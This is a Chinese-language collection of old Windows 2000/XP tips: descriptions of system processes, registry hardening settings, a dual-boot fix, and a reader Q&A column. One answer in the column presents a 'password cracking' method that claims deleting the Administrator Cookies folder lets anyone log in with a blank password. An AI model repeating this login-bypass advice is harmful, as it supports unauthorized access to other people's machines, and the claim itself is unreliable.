svchost.exe 包含很多系统服务
svchost.exe
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。(系统服务)
explorer.exe 资源管理器
internat.exe 托盘区的拼音图标
附加的系统进程（这些进程不是必要的，你可以根据需要通过服务管理器来增加或减少）:
mstask.exe 允许程序在指定时间运行。(系统服务)
regsvc.exe 允许远程注册表*作。(系统服务)
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe 通过 Internet 信息服务的管理单元提供 FTP 连接和管理。(系统服务)
tlntsvr.exe 允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)
允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。(系统服务)
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务的一部分。(系统服务)
termsrv.exe 提供多会话环境允许客户端设备访问虚拟的 Windows 2000 Professional 桌面会话以及运行在服务器上的基
于 Windows 的程序。(系统服务)
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)
以下服务很少会用到，上面的服务都对安全有害，如果不是必要的应该关掉
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。(系统服务)
支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库。(系统服务)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。(系统服务)
msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统，或其它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的*作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息，然后将消息传递到运行在这台计算机上 SNMP 管理程序
。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)

详细说明：

win2k运行进程
Svchost.exe
Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位
在系统的%systemroot%\system32文件夹下。在启动的时候，Svchost.exe检查注册表中的位置来构建需要
加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务，
以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。
Svchost.exe 组是用下面的注册表值来识别。

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
每个在这个键下的值代表一个独立的Svchost组，并且当你正在看活动的进程时，它显示作为一个单独的
例子。每个键值都是REG_MULTI_SZ类型的值而且包括运行在Svchost组内的服务。每个Svchost组都包含一个
或多个从注册表值中选取的服务名，这个服务的参数值包含了一个ServiceDLL值。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service

更多的信息
为了能看到正在运行在Svchost列表中的服务。
开始－运行－敲入cmd
然后在敲入 tlist -s （tlist 应该是win2k工具箱里的冬冬）
Tlist 显示一个活动进程的列表。开关 -s 显示在每个进程中的活动服务列表。如果想知道更多的关于
进程的信息，可以敲 tlist pid。

Tlist 显示Svchost.exe运行的两个例子。
0 System Process
8 System
132 smss.exe
160 csrss.exe Title:
180 winlogon.exe Title: NetDDE Agent
208services.exe
Svcs: AppMgmt,Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,
LanmanWorkstation,LmHosts,Messenger,PlugPlay,ProtectedStorage,seclogon,TrkWks,W32Time,Wmi
220 lsass.exe Svcs: Netlogon,PolicyAgent,SamSs
404 svchost.exe Svcs: RpcSs
452 spoolsv.exe Svcs: Spooler
544 cisvc.exe Svcs: cisvc
556 svchost.exe Svcs: EventSystem,Netman,NtmsSvc,RasMan,SENS,TapiSrv
580 regsvc.exe Svcs: RemoteRegistry
596 mstask.exe Svcs: Schedule
660 snmp.exe Svcs: SNMP
728 winmgmt.exe Svcs: WinMgmt
852 cidaemon.exe Title: OleMainThreadWndName
812 explorer.exe Title: Program Manager
1032 OSA.EXE Title: Reminder
1300 cmd.exe Title: D:\WINNT5\System32\cmd.exe - tlist -s
1080 MAPISP32.EXE Title: WMS Idle
12XX rundll32.exe Title:
1000 mmc.exe Title: Device Manager
1144 tlist.exe
在这个例子中注册表设置了两个组。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost:
netsvcs: Reg_Multi_SZ: EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc
rpcss :Reg_Multi_SZ: RpcSs

smss.exe

csrss.exe

这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统
必须一直运行。csrss 负责控制windows，创建或者删除线程和一些16位的虚拟MS-DOS环境。

explorer.exe
这是一个用户的shell（我实在是不知道怎么翻译shell），在我们看起来就像任务条，桌面等等。这个
进程并不是像你想象的那样是作为一个重要的进程运行在windows中，你可以从任务管理器中停掉它，或者重新启动。
通常不会对系统产生什么负面影响。

internat.exe
这个进程是可以从任务管理器中关掉的。
internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置
HKEY_USERS\.DEFAULT\Keyboard Layout\Preload 加载内容的。
internat.exe 加载“EN”图标进入系统的图标区，允许使用者可以很容易的转换不同的输入点。
当进程停掉的时候，图标就会消失，但是输入点仍然可以通过控制面板来改变。

lsass.exe
这个进程是不可以从任务管理器中关掉的。
这是一个本地的安全授权服务，并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是
通过使用授权的包，例如默认的msgina.dll来执行的。如果授权是成功的，lsass就会产生用户的进入
令牌，令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。

mstask.exe
这个进程是不可以从任务管理器中关掉的。
这是一个任务调度服务，负责用户事先决定在某一时间运行的任务的运行。

smss.exe
这个进程是不可以从任务管理器中关掉的。
这是一个会话管理子系统，负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的，
包括已经正在运行的Winlogon，Win32（Csrss.exe）线程和设定的系统变量作出反映。在它启动这些
进程后，它等待Winlogon或者Csrss结束。如果这些过程时正常的，系统就关掉了。如果发生了什么
不可预料的事情，smss.exe就会让系统停止响应（就是挂起）。

spoolsv.exe
这个进程是不可以从任务管理器中关掉的。
缓冲（spooler）服务是管理缓冲池中的打印和传真作业。

service.exe
这个进程是不可以从任务管理器中关掉的。
大多数的系统核心模式进程是作为系统进程在运行。

System Idle Process
这个进程是不可以从任务管理器中关掉的。
这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器的时间。

taskmagr.exe
这个进程是可以在任务管理器中关掉的。
这个进程就是任务管理器。

winlogon.exe
这个进程是管理用户登录和推出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了，显示安全对话框。

winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化


2K修改注册表加强安全

《一键清理系统垃圾》

2K修改注册表加强安全

估计是我刚让黑的过吧 对这类话题具敏感 一看到就想贴出来 只是是让大家多多防呀 别像我一样惨

1)设置生存时间
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)

说明:指定传出IP数据包中设置的默认生存时间(TTL)值.TTL决定了IP数据包在到达
目标前在网络中生存的最大时间.它实际上限定了IP数据包在丢弃前允许通过的路由
器数量.有时利用此数值来探测远程主机操作系统.

2)防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

EnableICMPRedirects REG_DWORD 0x0(默认值为0x1)

说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)发送给它
的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应ICMP重定向报
文.

3)禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Inter
faces\interface

PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)

说明:“ICMP路由公告”功能可造成他人计算机的网络连接异常,数据被窃听,计算机被
用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网络异常.
因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送路由器发
现选项时启用.

4)防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

SynAttackProtect REG_DWORD 0x2(默认值为0x0)

说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时
间.路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,
则AFD的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和
TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施.

5) 禁止C$、D$一类的缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

AutoShareServer、REG_DWORD、0x0

6) 禁止ADMIN$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

AutoShareWks、REG_DWORD、0x0

7) 限制IPC$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

restrictanonymous REG_DWORD 0x0 缺省
                            0x1 匿名用户无法列举本机用户列表
                            0x2 匿名用户无法连接本机IPC$共享
说明:不建议使用2，否则可能会造成你的一些服务无法启动，如SQL Server

8)不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

IGMPLevel REG_DWORD 0x0(默认值为0x2)

说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修正这个
bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉.改成0后用
route print将看不到那个讨厌的224.0.0.0项了.

9)设置arp缓存老化时间设置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

ArpCacheLife　REG_DWORD 0-0xFFFFFFFF(秒数,默认值为120秒)
ArpCacheMinReferencedLife　REG_DWORD 0-0xFFFFFFFF(秒数,默认值为600)

说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引用的ARP
缓存项在ArpCacheLife秒后到期.如果ArpCacheLife小于ArpCacheMinReferencedLife,
未引用项在ArpCacheLife秒后到期,而引用项在ArpCacheMinReferencedLife秒后到期.
每次将出站数据包发送到项的IP地址时,就会引用ARP缓存中的项。

10)禁止死网关监测技术
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

EnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)

说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自动改用备份
网关.有时候这并不是一项好主意,建议禁止死网关监测.

11)不支持路由功能
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

IPEnableRouter REG_DWORD 0x0(默认值为0x0)

说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题.

12)做NAT时放大转换的对外端口最大值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

MaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)

说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端口数.正常
情况下,短期端口的分配数量为1024-5000.将该参数设置到有效范围以外时,就会使用最
接近的有效数值(5000或65534).使用NAT时建议把值放大点.

13)修改MAC地址
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class
找到右窗口的说明为"网卡"的目录,
比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}

展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的说明,
比如说"DriverDesc"的值为"Intel(R) 82559 Fast Ethernet LAN on Motherboard"
然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想要的MAC值，比如说
是"004040404040"
然后重起计算机，ipconfig /all看看.


2000XP双系统启动问题

《一键清理系统垃圾》

2000XP双系统启动问题

先装好了WindowsXP，然后再安装Windows 2000。开机后发现Windows XP的滚动条消失后，电脑即黑屏，无法进入登录画面。

    其实，这个问题是因为当安装好Windows 2000后，某些系统文件从高版本变回低版本，因此导致Windows XP无法识别。解决这个问题很简单：从Windows XP安装光盘中将I386目录中的NTLDR、DOSNET.INF复制到C盘根目录下替换现有文件即可。

    提示：安装多操作系统时，遵循Windows 98→Windows 2000→Windows XP→Windows 2003的顺序，就不会出现系统间互相“干扰”的问题。


2000密码破解

《一键清理系统垃圾》

2000密码破解

    问：葛博士，我单位一个同事调出去了，留下一台电脑，是Windows2000，但是进入Windows2000需要密码，我们打电话问他，他说忘了。现在电脑不能用，除了重新安装系统，有什么方法能够破解？上次来信问，你不信任我，不肯说。到底是你不懂还是怎么？请相信我，我的真实姓名、单位和电话是……(略)。你可以验证。

    答：其实破解方法有很多，有些网站存放有专用软件——可制作自动破解启动盘，供用户下载的。有些人很喜欢问关于破解方面的问题，通常我是不回答的，总是有点不放心。不过反正现在网络上这类东西也是很泛滥的，再说，过去商店里不卖匕首，也有人自制以后用来伤人的。何况看这本杂志的读者，也希望看到一些这方面内容，因此，今天就破例告诉你一个方法，简单得很，你去试试：用户不小心忘记了密码，造成无法登录Ｗｉｎｄｏｗｓ２０００ 时，只需用启动盘启动电脑或引导进入另一操作系统（如电脑安装有Ｗｉｎ９８与Ｗｉｎ２０００双系统），找到文件夹“Ｘ＼Ｄｏｃｕｍｅｎｔｓ ａｎｄ Ｓｅｔｔｉｎｇｓ＼Ａｄｍｉｎｉｓｔｒａｔｏｒ”（Ｘ为Ｗｉｎｄｏｗｓ２０００所在磁盘的盘符），将此文件夹下的 “Ｃｏｏｋｉｅｓ”文件夹删除，然后重新启动电脑，即可以空密码快速登录Ｗｉｎｄｏｗｓ２０００。为安全起见，用户可重新设置各用户密码。

关　机

    问：葛博士：您好，前不久，我的电脑出现过IE首页被改且自己不能修改、注册表被锁等情况，通过您的帮助得以解决，在此非常感谢。但现在常出现通过“开始→关闭系统→关闭计算机”无法实现正常关机，只能通过电源开关关机，您邮给我的“解禁止关机”程序我也多次运行过，仍出现该情况，在每次关机前我均关闭了自己的应用程序。但每次非正常关机后马上重启计算机，按“开始→关闭系统→关闭计算机”程序又能顺利实现关机。我现在很苦恼，请您出出高招。

    答：解禁止关机键值，仅仅是使之能够“在开始菜单出现‘关机’选项”，没什么大用。不能正常关机的原因非常复杂。试试以下办法：
    １．运行ＭＳＣｏｎｆｉｇ，在高级选项中，禁止允许快速关机；
    ２．到安全模式，对我的电脑单击右键选属性，在设备管理中看看，是否正常，删除多余的东西；
    ３．到正常开机，对我的电脑单击右键选属性，在设备管理中看看，是否正常；
    ４．正确安装所有硬件的驱动程序，最好用最新的驱动程序；
    ５．杀病毒，防黑客；
    ６．运行ＭＳＣｏｎｆｉｇ，在启动项删除多余和不必要的挂载程序，也是防止“黑”程序的手段。

邮　件

    问：葛博士，您好！在看4月份的“网络诊所”的时候,看到介绍关于一个软件CWEBMAIL可以让OUTLOOK接受HOTMAIL OR YAHOO的信件,我从网上下载安装,但是并没有起作用啊,而且http://wwwcwebmail.com/这个网站也无法访问啊(我的不少朋友都试了,并非我的机器的问题)。请您在百忙中帮忙找一个可用的WEB邮件代理软件,我知道新出的FOXMAIL42里有这个功能,可是在接收HOTMAIL的时候做的并不是很好,总是收到一两封信就断了,所以麻烦您找一款好用的代理软件好吗?急用！ 万分感谢!致礼！ Alex

    答：以后再说。现在还没有办法。有人以为在网页上收发邮件是时尚和趋势，但在我看来：用的人是菜鸟行为——因为这些人如果有很多邮箱岂不要忙死？而提供的人是小家子气——大概是希望提高点击率。尽管这两家Ｅ－ｍａｉｌ服务提供商都是鼎鼎大名的——一家的背景是微软，另一家是全球最大搜索引擎网站。
    可是我觉得好的Ｅ－ｍａｉｌ服务应当至少提供Ｗｅｂ和客户端收发两种方式供用户选择，最好还有转发功能。如果大家觉得Ｙａｈｏｏ和Ｈｏｔｍａｉｌ不好，可以通过上海热线 ｈｔｔｐ／／ｗｗｗ．ｏｎｌｉｎｅ．ｓｈ．ｃｎ／ 注册免费的“吸铁石”Ｅ－ｍａｉｌ服务，吸铁石的注册非常快速，即开即通。看到以下画面了吗？
    就在上海热线主页靠上部的地方，新用户点击“注册”就可以进入注册。
    或者也可以寻找其他Ｅ－ｍａｉｌ服务。网络上免费的Ｅ－ｍａｉｌ服务不少的。例如访问 ｈｔｔｐ／／ｗｗｗ．ｍｏｏｎ－ｓｏｆｔ．ｃｏｍ／ｗｅｂ／ｆｒｅｅｍａｉｌ．ｈｔｍ ，就可以看到一些免费Ｅ－ｍａｉｌ资源。而且据说Ｈｏｔｍａｉｌ已经开始对一些服务收费，例如对邮件守护程序Ｅ－ｍａｉｌ ｊａｎｉｔｏｒ收费，最近一些用户反映：信箱灌满垃圾的现象也很严重。有些用户因为没有付费，重要的邮件被删除。并且，Ｈｏｔｍａｉｌ的免费注册用户，一个月不用就会被取消资格。
    告诉大家一句市场营销学方面的至理名言：任何会引起消费者不满的商业行为，最终都会以失败收场！请大家记住这句话并以你终身的实践来检验。你知道这是哪位大师说的吗？嘿嘿，那就是我。Ｄ

下　载

    问：葛博士：你好！我用网际快车下载时，显示：
Sat Apr 12 00:24:28 2003 正在连接 99010.org:9458
Sat Apr 12 00:24:28 2003 正在连接 99010.org [IP=211.154.211.87:9458]
Sat Apr 12 00:24:29 2003 有错误发生!
Sat Apr 12 00:24:29 2003 等待 1秒后重试
Sat Apr 12 00:24:30 2003 正在连接 99010.org [IP=211.154.211.87:9458]
Sat Apr 12 00:24:31 2003 有错误发生!
Sat Apr 12 00:24:31 2003 等待 1秒后重试
Sat Apr 12 00:24:32 2003 正在连接 99010.org [IP=211.154.211.87:9458]
Sat Apr 12 00:24:33 2003 有错误发生!
Sat Apr 12 00:24:33 2003 等待 1秒后重试
Sat Apr 12 00:24:34 2003 正在连接 99010.org [IP=211.154.211.87:9458]
Sat Apr 12 00:24:35 2003 有错误发生!
Sat Apr 12 00:24:35 2003 等待 1秒后重试
Sat Apr 12 00:24:36 2003 正在连接 99010.org [IP=211.154.211.87:9458]
Sat Apr 12 00:24:38 2003 有错误发生!
Sat Apr 12 00:24:38 2003 等待 1秒后重试
Sat Apr 12 00:24:39 2003 正在连接 99010.org [IP=211.154.211.87:9458]
Sat Apr 12 00:24:40 2003 有错误发生!
Sat Apr 12 00:24:40 2003 已达到最大错误数，该线程暂停。
    而我确定地址、用户名、密码等都没有错，那为什么说有错误发生呢？

    答：很简单，你试试其他地方是否可以下载，如果行，就是那个网站的问题，如果你确定你没有错误，就是别人的错误。有些小网站连接数量有限，别人在下载，你就连不上，要等到半夜、凌晨等空闲的时候才行。

卸　载

    问：葛博士：你好！我想把WINDOWS MEDIA PLAYER删掉重装，但是在XP里的控制面板中删不掉，其他的卸载工具也不行，怎么办？

    答：还是到电脑之家ｈｔｔｐ／／ｗｗｗ．ｐｃｈｏｍｅ．ｎｅｔ／下载新版本安装比较好，有Ｗｉｎｄｏｗｓ Ｍｅｄｉａ Ｐｌａｙｅｒ Ｆｏｒ ＷｉｎＸＰ 中文版 ９．０和英文版９．０。原来Ｗｉｎｄｏｗｓ ＸＰ里面的是８．０版本。Ｗｉｎｄｏｗｓ的东西，为了增强总体竞争力，往往捆绑在一起，千丝万缕，没那么好弄。

WinXP设置

    问：请问Windows XP的注册表是否与Windows98不一样，我想隐藏我的电脑或我的硬盘，根据书上学的，找不到选项，请问我应该怎样在我的windowXP上修改呢？谢谢！

    答：注册表是不一样，其实你真的要进行管理，ＸＰ安装时要是转换成ＮＴＦＳ分区格式，就会有许多对分区和文件夹的管理功能。
    到：ｈｔｔｐ／／ｔｅｃｈ．ｚｂｉｎｆｏ．ｎｅｔ／７２３４２３８４
８６３６０８８３２／２００２０１１４／２０５６９３．ｓｈｔｍｌ看看。有介绍Ｗｉｎｄｏｗｓ ＸＰ文件共享设置的。
    而在：ｈｔｔｐ／／ｄｏｗｎｌｏａｄ．ｐｃｈｏｍｅ．ｎｅｔ／ｓｙｓｔｅｍ／ｔｒｅａｋ／１３９３２．ｈｔｍｌ有下载ＷｉｎＸＰ总管 ｖ４．６１ 特别版的。
    运行平台： ＷＩＮ２０００／ＸＰ／ＮＴ
    软件简介： ｗｉｎｘｐ总管是专门针对ＷｉｎｄｏｗｓＸＰ操作系统进行优化设置的系统软件。它会使您的系统变得更加简洁、速度更快、更为安全以及更符合您的个性。
    １．系统信息包括系统概览、操作系统、Ｗｉｎ系统命令、控制台命令四个功能模块，可以显示您系统中的一些重要的硬件、软件信息以及调用系统命令。
    ２．系统优化包括系统提速、系统安全、多媒体、系统服务四个功能模块，从各个方面对系统进行优化。
    ３．系统清理包括垃圾文件、注册表清理、系统减肥、删除程序四个功能模块，全方位清除系统一些不必要的文件，使您的系统变得更加苗条，提高运行速度。
    ４．个性设置包括自动运行程序、输入法、鼠标右键、其他个性设置四个功能模块，令系统更加符合您的个性。
    ５．网络设置包括ＩＥ浏览器、网络设置两个功能模块，优化ＩＥ浏览器的各项功能以及上网速度。
    ６．关于软件包括设置密码、帮助、软件注册四个功能模块。

    问：请问，我在XP系统下上网时，“驱动下载更新”经常出现。每天上网都要求下载一些新的驱动程序。可否去掉它！在那里设置呀！ 请教！ 谢谢！！

    答：对我的电脑单击右键，选属性，选中“自动更新”选项卡，选中“关闭自动更新，我将手动更新计算机”。还有，在控制面板里，打开Ｉｎｔｅｒｎｅｔ选项，选中“高级”选项卡，拉动滚动条到最后，将“自动检查Ｉｎｔｅｒｎｅｔ Ｅｘｐｌｏｒｅｒ更新”前面的勾去掉。

注册表

    问：我是用修改注册表的方法把注册表锁了。通过编辑注册表键值做的：
REGEDIT4

[hkey_current_user\software\microsoft\windows\currentversion\policies\system]
"disableregistrytools"=dword:1
     我这样锁了，就再用下面这个来解锁:
REGEDIT4
[hkey_current_user\software\microsoft\windows\currentversion\policies\system]
"disableregistrytools"=dword:0
     我看过很多书都这样教的，但不知道为什么我不行！为什么啊？

    答：看下面。键值内容应当是：
ＲＥＧＥＤＩＴ４

ＨＫＥＹ＿ＣＵＲＲＥＮＴ＿ＵＳＥＲ＼Ｓｏｆｔｗａｒｅ＼Ｍｉｃｒｏｓｏｆｔ＼Ｗｉｎｄｏｗｓ＼ＣｕｒｒｅｎｔＶｅｒｓｉｏｎ＼Ｐｏｌｉｃｉｅｓ＼Ｓｙｓｔｅｍ
″ＤｉｓａｂｌｅＲｅｇｉｓｔｒｙＴｏｏｌｓ″＝ｄｗｏｒｄ０００００００１
和
ＲＥＧＥＤＩＴ４

ＨＫＥＹ＿ＣＵＲＲＥＮＴ＿ＵＳＥＲ＼Ｓｏｆｔｗａｒｅ＼Ｍｉｃｒｏｓｏｆｔ＼Ｗｉｎｄｏｗｓ＼ＣｕｒｒｅｎｔＶｅｒｓｉｏｎ＼Ｐｏｌｉｃｉｅｓ＼Ｓｙｓｔｅｍ
″ＤｉｓａｂｌｅＲｅｇｉｓｔｒｙＴｏｏｌｓ″＝ｄｗｏｒｄ００００００００

硬盘整理

    问：葛博士：你好，我想问一下我的D盘进行碎片整理时，到了40%时就整理不过去了，后来我对D盘进行了扫描，也没出现什么问题，再次整理时还是这个问题。

    答：一般是由程序留驻内存造成的，你按热启动键，将留驻的程序尽量关闭。特别是杀毒软件。

硬盘格式化

    问：葛博士：你好，对硬盘进行FORMAT会不会对其有损害？如果经常格式化呢？时间长了会不会把硬盘格坏？

    答：经常Format没必要，并且只能高格，千万不要低格，低格就毁了。高格一般没关系。

蓝　屏

    问：博士：我的电脑每次开机后都会蓝屏，提示类似000000*000000错误，这是不是内存地址错误？再重启动后一切正常，为什么？

    答：估计CPU风扇停转，重新启动又转了。还有可能是内存条没安插妥当。反正最好开机箱检查一下。

虚拟光驱

    问：你好，请问虚拟光驱是什么？它的用途是什么？你用不用？谢谢！

    答：是一种软件，安装以后，你的电脑看上去就是多了一个光驱，实际上，使用时，先在普通光驱中，将光盘做成镜像文件写到硬盘，虚拟光驱就可以读入这种镜像，使用起来像真的载入一个光盘。镜像可以做很多，放在硬盘上，由虚拟光驱读入，速度很快，减少了光驱使用的时间和次数，起到保护光驱的作用。更主要的是提高读取速度和增加使用方面的便利性。这种镜像文件，放到网上共享也很方便。我用，用Virtual Drive Manager，有中文版的。

驱动程序

    问：葛老师：您好，现有一问题向您请教。我有一显卡的驱动程序找不到了，请问用win98能把显卡驱动起来吗？如何做，请您详细说明一下好吗？谢谢！卢慧

    答：开机的时候，手脚快一点，按暂停键Break然后看看显示卡类型，再到网络上寻找驱动程序，下载安装。Win98只能自认很少低档显示卡。

电脑选购

    问：博士，你好， 我有些问题想向你请教。
    1. 我的电脑的CPU是赛扬667，我不知道667指的是什么？是667MHZ？我问卖电脑的人，他说是赛扬3，赛扬3又是什么? 我的CPU不知道属于什么样的级别？ 什么样的CPU是物美价廉的？听说有个价钱在590元的P4 2.0GHZ的CPU，不知道它怎么样？
    2. 怎样才能提高我的计算机的速度? 如果我玩游戏，游戏的速度是由什么决定的呢？是CPU还是主板？
    3. 能否从机器上看出我PC机的硬盘与CPU的型号和参数的数值？
    4. 显示器怎样分好坏?他们有什么不同？二手的显卡能买吗？
    5. 我现在是在校生，想配置一部电脑，请推荐配置，希望价钱在2500元左右。 最好性价比好些。

    答：１．ＣＰＵ的频率，一般是越高越好。至于什么是赛扬３，三言两语讲不清，你不用知道。赛扬３相当于奔腾Ⅲ档次。Ｐ４ ２．０绝对不止５９０元，赛扬４的２．０也比这个贵。
    目前性价比好的ＣＰＵ有赛扬３、１Ｇ以上不含１Ｇ、Ｔｕａｌａｔｉｎ核心的、２５６Ｋ的Ｃａｃｈｅ。还有赛扬４、２Ｇ、Ｎｏｒｔｈｗｏｏｄ核心、０．１３微米技术的。
    ２．机器速度的决定因素很多，就像赛车，不会仅仅是发动机决定。游戏，高档的，显示卡极其重要。
    ３．有专用测试软件。大部分情况能从开始、程序、附件、系统工具的系统信息里看到。
    ４．显示器越贵越好，差别很大、极大，你觉得没差别也可以，就像玉的差别，５元？５万元？当然，显示器对眼睛的健康有关系。
    不能买太差的。二手的东西，风险很大，显示卡最好当场测试并有几个星期包退，最好驱动程序和说明书齐全。
    ５．参考：如图

其　它

    问：请问，没有刻录机，只利用软件能向CD或VCD光盘里存东西吗?如果能，应该怎样做?谢谢!

    答：没有刻录机当然也能做，光盘生产线不就是吗？事先做好模具，注塑！你说的是个人电脑？啊啊，那就别梦想啦！

    问：GWM,您好！请教你一个问题：音箱的低音在听音乐或者看电影的时候应该怎么调整，才能达到最佳效果？是不是要根据音乐的种类来调整啊？重音是不是越低越好？

    答：这是根据喜好调整的，而且声霸卡、音箱种类太多了，你自己听。当然是你觉得好就好。重音也不是越低越好，你听女高音，重音很低，就难听。

    问：葛博士:能告诉我Office小助手在哪个目录下吗?我想提取出来放在其他地方用。还有PowerPoint中的风铃声之类的放在哪里?谢谢！阿虹

    答：你管他放在哪里？能用就行。有些功能不能提取的。至于铃声，你一个个去找——声音文件。在Ｐｒｏｇｒａｍ Ｆｉｌｅｓ＼Ｍｉｃｒｏｓｏｆｔ Ｏｆｆｉｃｅ＼Ｏｆｆｉｃｅ１０＼Ｍｅｄｉａ目录下，以后遇上这种事情，你自己解决！你自己不找，我也没有空闲，你看看我回信的时间！！！半夜两点啦！

    问：请问登录时在选择上网类型时有局域网上网和拔号上网两个选项,为什么我们在用拔号上网时选择用局域网上也可以登录,而当我们在局域网上时选用拔号上网时就不能登录了？为什么会这样？如果我用拔号上网时选取局域网登录会不会对上网有什么影响？

    答：拨号上网与通过局域网上网通道不一样，一种是MODEM；另一种是网卡。所以要正确选择。要看物理连接方式。你乱选，有时候是电脑自己识别了，而不是你选的方式能够起作用。

    问：葛博士，您好！我最近用ghost7.0镜像我的c系统盘到了e盘，之后，我的e盘里的全部内容全不能读了。好象被屏蔽掉了，完全变成系统盘的那个模样，而空间比以前大了400M左右。不知道要怎样才能恢复我以前的那些内容，请详细告之，谢谢！

